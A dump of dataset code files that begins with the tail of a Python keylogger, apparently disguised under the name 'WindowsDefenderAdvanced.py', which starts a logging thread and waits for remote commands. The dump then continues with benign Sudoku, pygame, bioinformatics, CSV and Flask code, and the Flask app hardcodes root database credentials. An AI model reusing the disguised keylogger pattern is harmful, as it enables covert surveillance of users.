'Iniciando Hilo de Keylogger')\ncd.log('i', 'Keylogger iniciado')\n\np1 = threading.Thread(target=Klogger) # Keylogger \np1.start() # Inicia hilo keylogger\ncd.log('s', 'Todo se ejecutó con exito\\n')\ncd.log('i', 'Esperando comandos ==>> ' + platform.uname()[1] + '...\\n\\n')\npythoncom.PumpMessages() # Escucha los comandos\np1.join()\n","sub_path":"WindowsDefenderAdvanced.py","file_name":"WindowsDefenderAdvanced.py","file_ext":"py","file_size_in_byte":45113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"650720187","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 
-*-\n\"\"\"\nAuthor: Raphael Gonzalez\n\"\"\"\nfrom random import randint\nclass Blank_Sudoku():\n def __init__(self):\n self.sdk = []\n self.zeros = {}\n for i in range(9):\n row = []\n for j in range(9):\n possible_vals = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n self.zeros[(i, j)] = possible_vals[:]\n row.append(0)\n self.sdk.append(row)\n self.gen_puzzle()\n self.last_0s = self.get_last_0s()\n def __str__(self):\n sdk_str = \"\"\"\"\"\"\n for i in range(9):\n for j, val in enumerate(self.sdk[i]):\n if j % 3 == 0 and j != 0:\n sdk_str += \"| \" + str(val) + \" \"\n else:\n sdk_str += str(val) + \" \"\n sdk_str += \"\\n\"\n if i % 3 == 2 and i != 8:\n sdk_str += \"–\"*21 + \"\\n\"\n return sdk_str\n def get_cols(self):\n ''' this assumes a normal 9x9 sudoku'''\n collumns = []\n for i in range(9):\n col = []\n for j in range(9):\n col.append(self.sdk[j][i])\n collumns.append(col)\n return collumns\n def get_boxes(self):\n '''\n :returns the boxs of the sudoku left to right top to bottom\n '''\n boxes = []\n for i in range(9):\n if i == 0 or i % 3 == 0:# works for cunstructing boxes with normal list input, but doesn't with the np array\n box_set_1 = self.sdk[i][:3] + self.sdk[i+1][:3] + self.sdk[i+2][:3]\n boxes.append(box_set_1)\n box_set_2 = self.sdk[i][3:6] + self.sdk[i+1][3:6] + self.sdk[i+2][3:6]\n boxes.append(box_set_2)\n box_set_3 = self.sdk[i][6:] + self.sdk[i+1][6:] + self.sdk[i+2][6:]\n boxes.append(box_set_3)\n return boxes\n def get_box_id(self, r, c):\n if r < 3 and c < 3:\n return 0\n elif r < 3 and c >= 3 and c < 6:\n return 1\n elif r < 3 and c > 5:\n return 2\n elif r >= 3 and r < 6 and c < 3:\n return 3\n elif r >= 3 and r < 6 and c >= 3 and c < 6:\n return 4\n elif r >= 3 and r < 6 and c > 5:\n return 5\n elif r > 5 and c < 3:\n return 6\n elif r > 5 and c >= 3 and c < 6:\n return 7\n else:\n return 8\n def get_possibilities(self, r, c):\n row = self.sdk[r]\n col = self.get_cols()[c]\n box = self.get_boxes()[self.get_box_id(r, c)]\n info = row + col + box\n all_nums = (1, 2, 3, 4, 5, 6, 7, 8, 9)\n p = [] # all the possibilities for a given coordinate (r, c)\n for n in all_nums:\n if n not in info:\n p.append(n)\n return p\n def pick_num(self, row, col):\n possibilities = self.get_possibilities(row, col)\n if len(possibilities) < 1:\n raise Exception(f'there were no possibilities at ({row}, {col})')\n return possibilities[randint(0, len(possibilities)-1)]\n def gen_puzzle(self):\n for r_index in range(9):\n for c_index in range(9):\n try:\n self.sdk[r_index][c_index] = self.pick_num(r_index, c_index)\n except:\n # go back some where in the puzzle and make an edit\n pass\n def get_last_0s(self):\n zero_coords = []\n for r in range(9):\n for c in range(9):\n if self.sdk[r][c] == 0:\n zero_coords.append((r, c))\n return zero_coords\n\n\n########### old and bad pick_num func\n# box_fill_limit = randint(3, 6) # amount of numbers that can be predetermined in a box\n# col_fill_limit = randint(3, 6) # amount of numbers that can be predetermined in a column\n# row_fill_limit = randint(3, 6) # amount of numbers that can be predetermined in a box in a row\n# box = self.get_boxes()[self.get_box_id(row, col)]\n# column = self.get_cols()[col]\n# this_row = self.sdk[row]\n# def check_limit(arr):\n# fill_val = 0\n# for i in arr:\n# if i != 0:\n# fill_val +=1\n# return fill_val\n# if col_fill_limit <= check_limit(column):\n# pass\n# elif box_fill_limit <= check_limit(box):\n# pass\n# elif row_fill_limit <= check_limit(this_row):\n# pass\n# else:\n# try:\n# possibilities = self.zeros[(row, col)]\n# 
index = randint(0, len(possibilities) - 1)\n# self.sdk[row][col] = possibilities[index]\n# self.update_zeros()\n# except KeyError:\n# pass","sub_path":"Python/sudoku_gen.py","file_name":"sudoku_gen.py","file_ext":"py","file_size_in_byte":4815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"652939731","text":"import constants\nimport pygame\n\nfrom sprites.bullet import Bullet\nfrom components.button import Button\nfrom non_sprites.player import Player\n\n\nclass PlayLevel:\n\n def __init__(self, engine, level):\n self.engine = engine\n self.buttons = pygame.sprite.Group()\n\n self.buttons.add(Button(5, 5, './static/images/components/buttons/quit.png', self.quit))\n self.buttons.add(Button(constants.WIDTH - 85, 5, './static/images/components/buttons/menu.png', self.menu))\n\n self.menu_bar = pygame.Surface((constants.WIDTH, constants.MENU_BAR_HEIGHT))\n self.game_window = pygame.Surface((constants.WIDTH, constants.HEIGHT - constants.MENU_BAR_HEIGHT))\n\n self.level = level\n # TODO (big one) `\n self.player = Player(40, self.level.board_height() * 40 - 70)\n\n self.scroll_x = 0\n self.scroll_y = 0\n self.min_scroll_x = 0\n self.min_scroll_y = 0\n self.max_scroll_x = self.level.board_width() * 40 - self.game_window.get_width()\n self.max_scroll_y = self.level.board_height() * 40 - self.game_window.get_height()\n\n self.bullets = pygame.sprite.Group()\n\n self.click_list = []\n\n # This function takes a click location and determines where the user clicked relative to the map and the sprites.\n # If fullscreen or window resizing are ever implemented, this should be the only update function that needs to be changed.\n # It just uses scroll_x and scroll_y (and in the future: window_size) to determine the location of the click.\n def transform_click_coords(self, pos):\n result = (pos[0] + self.scroll_x, pos[1] - constants.MENU_BAR_HEIGHT +self.scroll_y)\n return result\n\n def click(self, pos):\n # TODO don't add a new bullet if the user cicks in the menu area\n self.bullets.add(Bullet((self.player.get_pixel_coords()[0] + 15, self.player.get_pixel_coords()[1] + 15), self.transform_click_coords(pos)))\n\n def quit(self):\n self.engine.quit()\n\n def menu(self):\n from perspectives.main_menu import MainMenu\n self.engine.switch_perspective(MainMenu(self.engine))\n\n def tick(self, screen):\n # Input\n for event in pygame.event.get():\n # TODO apparently mouse scrolling triggers this event\n if event.type == pygame.MOUSEBUTTONDOWN:\n for button in self.buttons:\n button.register_press(event.pos)\n self.click(event.pos)\n if event.type == pygame.MOUSEBUTTONUP:\n for button in self.buttons:\n button.register_release(event.pos)\n if event.type == pygame.MOUSEMOTION:\n for button in self.buttons:\n button.register_movement(event.pos)\n if event.type == pygame.QUIT:\n self.quit()\n\n key_state = pygame.key.get_pressed()\n if key_state[pygame.K_w]:\n self.player.move_y(-constants.MOVE_SPEED, self.level.board)\n if key_state[pygame.K_s]:\n self.player.move_y(constants.MOVE_SPEED, self.level.board)\n if key_state[pygame.K_d]:\n self.player.move_x(constants.MOVE_SPEED, self.level.board)\n if key_state[pygame.K_a]:\n self.player.move_x(-constants.MOVE_SPEED, self.level.board)\n\n # Update\n self.buttons.update()\n for bullet in self.bullets:\n bullet.update(self.level.board)\n\n # Draw\n self.menu_bar.fill(constants.COLORS.GREEN)\n self.buttons.draw(self.menu_bar)\n\n self.scroll_x = self.player.x - (self.game_window.get_width()/2 - 15)\n self.scroll_y 
= self.player.y - (self.game_window.get_height()/2 - 15)\n\n if self.scroll_x < self.min_scroll_x:\n self.scroll_x = self.min_scroll_x\n if self.scroll_x > self.max_scroll_x:\n self.scroll_x = self.max_scroll_x\n if self.scroll_y < self.min_scroll_y:\n self.scroll_y = self.min_scroll_y\n if self.scroll_y > self.max_scroll_y:\n self.scroll_y = self.max_scroll_y\n\n self.level.draw(self.game_window, self.scroll_x, self.scroll_y)\n self.player.draw(self.game_window, self.scroll_x, self.scroll_y, self.max_scroll_y)\n\n for bullet in self.bullets:\n if bullet.should_destroy(self.level.board):\n self.bullets.remove(bullet)\n bullet.draw(self.game_window, self.scroll_x, self.scroll_y)\n\n screen.fill(constants.COLORS.SILVER)\n screen.blit(self.menu_bar, (0, 0))\n screen.blit(self.game_window, (0, 40))\n\n","sub_path":"perspectives/play_level.py","file_name":"play_level.py","file_ext":"py","file_size_in_byte":4576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"557158050","text":"\"\"\"Convert :term:`BAM` format to :term:`fasta` file\"\"\"\nfrom bioconvert import ConvBase\n\n\nclass BAM2Fasta(ConvBase):\n \"\"\"Bam2Fasta converter\n\n Wrapper of bamtools to convert bam file to fasta file.\n\n \"\"\"\n input_ext = ['.bam']\n output_ext = ['fasta', 'fa']\n\n def __init__(self, infile, outfile):\n \"\"\".. rubric:: constructor\n\n :param str infile:\n :param str outfile:\n\n library used: pysam (samtools)\n \"\"\"\n super().__init__(infile, outfile)\n self._default_method = \"bamtools\"\n\n def _method_bamtools(self, *args, **kwargs):\n \"\"\"\n\n .. note:: fastq are split on several lines (80 characters)\n\n \"\"\"\n # Another idea is to use pysam.bam2fq but it fails with unknown error\n #pysam.bam2fq(self.infile, save_stdout=self.outfile)\n #cmd = \"samtools fastq %s >%s\" % (self.infile, self.outfile)\n #self.execute(cmd)\n # !!!!!!!!!!!!!!!!!! pysam.bam2fq, samtools fastq and bamtools convert\n # give differnt answers...\n\n cmd = \"bamtools convert -format fasta -in {0} -out {1}\".format(\n self.infile, self.outfile\n )\n self.execute(cmd)\n\n def _method_samtools(self, *args, **kwargs):\n \"\"\"\n do the conversion :term`BAM` -> :term:'Fasta` using samtools\n\n :return: the standard output\n :rtype: :class:`io.StringIO` object.\n\n .. 
note:: fasta are on one line\n \"\"\"\n cmd = \"samtools fasta {} > {}\".format(self.infile, self.outfile)\n self.execute(cmd)\n\n","sub_path":"bioconvert/bam2fasta.py","file_name":"bam2fasta.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"504469329","text":"from flask import Flask, render_template, request, redirect, url_for, flash\nfrom flask_sqlalchemy import SQLAlchemy\n\n\napp = Flask(__name__)\napp.secret_key = \"root\"\n\n#SqlAlchemy Database Configuration With Mysql\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:root@127.0.0.1:8306/certification'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\n\n#Creating model table for our CRUD database\nclass QuestionTemplates(db.Model):\n id = db.Column(db.Integer, primary_key = True)\n question = db.Column(db.Text)\n answer = db.Column(db.Text)\n correct = db.Column(db.Integer)\n randomize = db.Column(db.Boolean)\n type = db.Column(db.Text) # Enum()\n aota = db.Column(db.Boolean)\n nota = db.Column(db.Boolean)\n enabled = db.Column(db.Boolean)\n comments = db.Column(db.Text)\n\n def __init__(self, question, answer, correct, randomize, type, aota, nota, enabled, comments):\n\n self.question = question \n self.answer = answer \n self.correct = correct \n self.randomize = randomize \n self.type = type \n self.aota = aota \n self.nota = nota \n self.enabled = enabled \n self.comments = comments \n\n\n#This is the index route where we are going to\n#query on all our employee data\n@app.route('/')\ndef Index():\n all_data = QuestionTemplates.query.all()\n\n return render_template(\"index.html\", question_templates = all_data)\n\n\n#this route is for inserting data to mysql database via html forms\n@app.route('/insert', methods = ['POST'])\ndef insert():\n\n if request.method == 'POST':\n\n question = request.form['question']\n answer = request.form['answer']\n correct = request.form['correct']\n randomize = request.form['randomize']\n type = request.form['type']\n aota = request.form['aota']\n nota = request.form['nota']\n enabled = request.form['enabled']\n comments = request.form['comments'] \n\n\n my_data = QuestionTemplates(question, answer, correct, randomize, type, aota, nota, enabled, comments)\n db.session.add(my_data)\n db.session.commit()\n\n flash(\"Question Template Inserted Successfully\")\n\n return redirect(url_for('Index'))\n\n\n#this is our update route where we are going to update our question template\n@app.route('/update', methods = ['GET', 'POST'])\ndef update():\n\n if request.method == 'POST':\n my_data = QuestionTemplates.query.get(request.form.get('id'))\n\n # Determine whether enabled checkbox is checked\n if request.form.get('enabled'):\n my_data.enabled = True\n else:\n my_data.enabled = False\n\n # Entries depend on question type\n\n my_data.type = request.form['type']\n\n if my_data.type == 'Multiple Choice':\n\n # Determine if checkboxes are checked\n if request.form.get('randomize'):\n my_data.randomize = True\n else:\n my_data.randomize = False\n\n if request.form.get('aota'):\n my_data.aota = True\n else:\n my_data.aota = False\n\n if request.form.get('nota'):\n my_data.nota = True\n else:\n my_data.nota = False\n\n # Multiple choice default for correct is 1\n\n correct = request.form['correct']\n if correct is None:\n my_data.correct = 1\n else:\n my_data.correct = correct\n\n my_data.question = request.form['question']\n my_data.answer = request.form['answer']\n 
my_data.comments = request.form['comments']\n\n elif my_data.type == 'True/False':\n\n my_data.question = request.form['question']\n my_data.answer = request.form['answer']\n my_data.comments = request.form['comments']\n my_data.correct = None\n my_data.randomize = None\n my_data.aota = None\n my_data.nota = None\n\n\n db.session.commit()\n flash(\"Question Template Updated Successfully\")\n\n return redirect(url_for('Index'))\n\n#this is our update route where we are going to update our question template\n#@app.route('/update', methods = ['GET', 'POST'])\n#def update():\n#\n# if request.method == 'POST':\n# my_data = QuestionTemplates.query.get(request.form.get('id'))\n#\n# my_data.question = request.form['question']\n# my_data.answer = request.form['answer']\n# my_data.correct = request.form['correct']\n# my_data.randomize = request.form['randomize']\n# my_data.type = request.form['type']\n# my_data.aota = request.form['aota']\n# my_data.nota = request.form['nota']\n# my_data.enabled = request.form['enabled']\n# my_data.comments = request.form['comments']\n#\n# db.session.commit()\n# flash(\"Question Template Updated Successfully\")\n#\n# return redirect(url_for('Index'))\n\n\n#This route is for deleting our employee\n@app.route('/delete//', methods = ['GET', 'POST'])\ndef delete(id):\n my_data = QuestionTemplates.query.get(id)\n db.session.delete(my_data)\n db.session.commit()\n flash(\"Question Template Deleted Successfully\")\n\n return redirect(url_for('Index'))\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"old_dev/flask/certification_old/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"207734411","text":"#! /usr/bin/env python3\n\"\"\"\nremove_csv_header.py - Removes the header from all CSV files in the\ncurrent working directory\n\"\"\"\n\nimport os\nimport csv\n\nos.chdir(os.path.join(os.getcwd(), 'sample_data'))\nos.makedirs('header_removed', exist_ok=True)\n\n# Loop through every file in the cwd\nfor csv_filename in os.listdir():\n if not csv_filename.endswith('.csv'):\n continue # skip non-csv files\n\n print(f'Removing header from {csv_filename}...')\n\n # Read the CSV file in (skipping the first row)\n csv_rows = []\n csv_file_obj = open(csv_filename)\n reader_obj = csv.reader(csv_file_obj)\n for row in reader_obj:\n if reader_obj.line_num == 1:\n continue # skip the first row\n csv_rows.append(row)\n csv_file_obj.close()\n\n # Write the CSV file\n csv_file_obj = open(\n os.path.join('header_removed', csv_filename), 'w', newline='')\n csv_writer = csv.writer(csv_file_obj)\n for row in csv_rows:\n csv_writer.writerow(row)\n csv_file_obj.close()\n","sub_path":"chapter16/programs/remove_csv_header.py","file_name":"remove_csv_header.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}